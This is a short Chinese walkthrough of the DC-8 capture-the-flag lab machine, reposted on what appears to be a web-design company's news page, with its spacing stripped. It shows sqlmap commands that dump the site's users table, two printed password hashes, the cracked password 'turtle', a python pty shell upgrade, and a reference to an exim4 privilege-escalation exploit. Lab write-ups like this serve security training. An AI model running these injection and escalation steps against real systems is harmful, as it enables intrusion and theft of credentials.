资讯动态

DC-8 靶机全流程攻略

发布时间:2026/8/20 12:05:12 来源:尧图企业网站定制
DC-8 靶机攻略扫描靶机目录爆破指纹识别访问网站Sqlmap注入测试找到注入点列库名sqlmap-uhttp://192.168.200.147/?nidtest-pnid--batch-dbs列表名sqlmap-uhttp://192.168.200.147/?nidtest-pnid--batch-Dd7db--tables列users表数据得到账密sqlmap-uhttp://192.168.200.147/?nidtest-pnid--batch-Dd7db-Tusers--dumpadmin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF用john爆破就爆破出来一个turtle进入后台尝试登录成功登录john的账号写入恶意代码反弹shell获取伪终端python-cimport pty;pty.spawn(/bin/bash)查看提权点这里用exim4查看版本号strings /usr/sbin/exim4|grep-iversion|head-5找相关漏洞这里选择第46996看漏洞描述上传执行脚本执行脚本权限没有提升看脚本帮助换一个参数启动成功提权找到flag

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价